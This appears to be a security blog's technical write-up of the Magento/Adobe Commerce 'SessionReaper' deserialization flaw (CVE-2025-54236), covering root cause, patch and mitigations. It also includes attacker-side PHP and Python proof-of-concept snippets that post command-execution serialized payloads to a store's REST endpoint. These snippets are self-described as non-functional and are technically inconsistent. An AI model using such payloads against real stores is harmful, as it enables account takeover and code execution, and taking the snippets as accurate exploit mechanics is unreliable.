SessionReaper (CVE-2025-54236): Magento & Adobe Commerce Deserialization Exploit Deep Dive
13 September 2025
CVE-2025-54236 (SessionReaper): In-Depth Technical Analysis and Exploitation Mechanics
Introduction
CVE-2025-54236, dubbed “SessionReaper,” is a critical security vulnerability affecting Adobe Commerce and Magento Open Source platforms. Classified under CWE-20 (Improper Input Validation), it carries a CVSS 3.1 score of 9.1 (Critical). The CVSS vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, indicating a network-based, low-complexity attack requiring no authentication or user interaction. This vulnerability allows unauthenticated attackers to exploit REST, GraphQL, or SOAP API endpoints, leading to session takeover or, under specific conditions (e.g., file-based session storage), remote code execution (RCE).
This article provides a comprehensive technical analysis of the vulnerability, including affected code paths, exploitation mechanisms, patch details, and a high-level Proof of Concept (PoC) pseudocode for educational purposes. All code snippets are illustrative and should not be tested on live systems.
Affected Systems and Versions
The vulnerability impacts a wide range of Adobe Commerce and Magento Open Source versions across all deployment methods (cloud, on-premise):
- Adobe Commerce:
- 2.4.9-alpha2 and earlier
- 2.4.8-p2 and earlier
- 2.4.7-p7 and earlier
- 2.4.6-p12 and earlier
- 2.4.5-p14 and earlier
- 2.4.4-p15 and earlier
- Adobe Commerce B2B:
- 1.5.3-alpha2 and earlier
- 1.5.2-p2 and earlier
- 1.4.2-p7 and earlier
- 1.3.4-p14 and earlier
- 1.3.3-p15 and earlier
- Magento Open Source:
- Same version ranges as Adobe Commerce
Additionally, the Custom Attributes Serializable module versions 0.1.0 to 0.4.0 are affected. Systems using default file-based session storage (var/session/sess_*) face the highest risk of RCE, though Redis or database-backed sessions are also vulnerable to session takeover with additional vectors.
Root Cause and Technical Details
The vulnerability stems from insufficient input validation in the Magento\Framework\Webapi\ServiceInputProcessor class, specifically in the getConstructorData() method. This method processes API payloads, converting them into constructor parameters for object instantiation. It supports scalar types (string, int, float, boolean) and API data interfaces (*\Api\Data\*Interface), but fails to adequately validate complex nested objects, leading to unsafe deserialization.
Vulnerable Code Path
The core issue lies in the handling of nested objects during deserialization. When a REST API request (e.g., /rest/V1/customers/{id}) contains a complex object, the ServiceInputProcessor attempts to deserialize it without strict type checking, enabling object injection. This can manipulate session data stored in var/session/sess_* files, particularly in file-based session storage, potentially triggering RCE via PHP’s unserialize() function (e.g., through __wakeup() or gadget chains).
Simplified pseudocode of the vulnerable getConstructorData() method:
// Vulnerable: ServiceInputProcessor::getConstructorData() - Pseudocode
function getConstructorData(array $inputData, string $className): object {
$params = [];
foreach ($inputData as $key => $value) {
if (is_scalar($value) || $this->isApiDataInterface($className, $key)) {
$params[$key] = $value; // Scalar types or interfaces accepted
} elseif (is_array($value) || is_object($value)) {
// Insufficient validation: Nested objects deserialized
$nestedClass = $this->resolveNestedClass($key);
$params[$key] = $this->processNestedData($value, $nestedClass); // Attack vector
} else {
throw new \Magento\Framework\Webapi\Exception("Invalid input type for {$key}");
}
}
// Object instantiation, potentially with malicious session
return $this->objectManager->create($className, $params);
}
The processNestedData() call (simplified here) triggers deserialization of attacker-controlled data, which can overwrite session files or execute malicious code in file-based storage scenarios. This behavior resembles past deserialization vulnerabilities like CosmicSting (2024).
Exploitation Mechanism
Exploitation involves two primary components:
- Crafting a Malicious Session: The attacker creates a serialized PHP object containing malicious code (e.g., invoking
system()via__destruct()). - Triggering Nested Deserialization: A crafted JSON payload is sent to an API endpoint, exploiting the deserialization flaw to manipulate session data or execute code.
Detailed exploitation steps:
- Step 1: Generate a serialized payload (e.g., a PHP object with a malicious
__wakeup()or__destruct()method). - Step 2: Embed the payload in a nested object within an API request (e.g., customer update endpoint).
- Step 3: Send the request, triggering deserialization in
ServiceInputProcessor. - Step 4: Achieve session takeover (account hijacking) or RCE (in file-based storage).
Pseudocode illustrating the exploitation flow (server-side simulation):
// Exploitation Flow Pseudocode - Attacker Side
$maliciousPayload = serialize(new MaliciousObject('system("whoami")')); // RCE-capable serialized object
$apiRequest = [
'customer' => [
'details' => [
'nested' => unserialize($maliciousPayload) // Triggers deserialization
]
]
];
// Simulate API call (e.g., via cURL)
$ch = curl_init('https://target/rest/V1/customers/update');
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($apiRequest));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_exec($ch);
// Result: Session file corrupted, potential RCE
For non-file-based storage (Redis, database), additional vectors like key manipulation may be required, but session takeover remains feasible. The attack is automatable, making it scalable for targeting multiple e-commerce sites.
Impact:
- Confidentiality: High – Exposure of customer data (addresses, payment details).
- Integrity: High – Account hijacking, order manipulation.
- Availability: Low – No direct denial-of-service, but indirect impacts possible.
Patch Analysis and Mitigation
Adobe released a hotfix (VULN-32437-2-4-X-patch.zip) via APSB25-88, available at repo.magento.com. The patch enforces strict type validation, rejecting complex nested objects and limiting inputs to scalar types or defined API data interfaces.
Patched getConstructorData() pseudocode:
// Patched: ServiceInputProcessor::getConstructorData() - Pseudocode
function getConstructorData(array $inputData, string $className): object {
$params = [];
foreach ($inputData as $key => $value) {
if (is_scalar($value) || $this->isApiDataInterface($className, $key)) {
$params[$key] = $value; // Only scalars or interfaces allowed
} else {
// Strict validation: Reject complex objects
throw new \Magento\Framework\Webapi\Exception("Unsupported parameter type for {$key}. Correct the field name and try again.");
}
}
return $this->objectManager->create($className, $params); // Safe instantiation
}
Error Messages Post-Patch:
- Versions >2.4.6:
"\"{fieldName}\" is not supported. Correct the field name and try again." - Versions ≤2.4.6:
"Property \"{fieldName}\" does not have accessor method \"{methodName}\" in class \"{className}\"."
Mitigation Steps:
- Download the hotfix from
repo.magento.com. - Apply using Composer: Follow Adobe’s patch application guide.
- Test in a staging environment, as custom API integrations may break.
- Post-patch: Rotate the crypt key and scan for malware (e.g., using eComscan).
Temporary Protections:
- Enable a Web Application Firewall (WAF), such as Fastly or Sansec Shield.
- Monitor API traffic for suspicious nested payloads.
- Restrict access to sensitive endpoints via IP whitelisting if possible.
For Custom Attributes Serializable module: Update to version 0.4.0 using composer require magento/out-of-process-custom-attributes=0.4.0 --with-dependencies.
Proof of Concept (PoC)
The following PoC is a high-level pseudocode simulation for educational purposes. It is not a functional exploit, as specific details are withheld for ethical reasons.
# SessionReaper PoC Pseudocode (Python Simulation)
import requests
import base64
import pickle # Simulate serialized data
# Malicious session payload: Example RCE object
class Malicious:
def __reduce__(self):
return (os.system, ('whoami',)) # Simulated RCE
malicious_session = base64.b64encode(pickle.dumps(Malicious()))
# API payload: Triggers nested deserialization
payload = {
"customer": {
"id": 123,
"nested_object": {
"__class__": "vulnerable_deserializer",
"session_data": malicious_session.decode() # Session manipulation
}
}
}
# Send request to REST API endpoint
url = "https://vulnerable-magento-site/rest/V1/customers/update"
headers = {"Content-Type": "application/json"}
response = requests.post(url, json=payload, headers=headers)
if response.status_code == 200:
print("Session takeover successful; potential RCE executed.")
else:
print(f"Exploit failed: {response.text}")
This PoC simulates injecting a malicious serialized object into a nested API payload to trigger deserialization. In a real scenario, the payload would be a PHP serialized object targeting a specific endpoint. The patched system will reject such requests.
Conclusion and Recommendations
CVE-2025-54236 underscores the critical importance of rigorous input validation in API-driven systems. As a deserialization-based vulnerability, it echoes past issues like CosmicSting (2024) and highlights the risks of complex object handling in Magento’s Web API framework. Immediate application of the hotfix is essential, alongside WAF deployment and malware scanning for unpatched systems. Developers must review custom modules for constructor injection risks and conduct regular security audits. This vulnerability serves as a stark reminder of the evolving threat landscape for e-commerce platforms.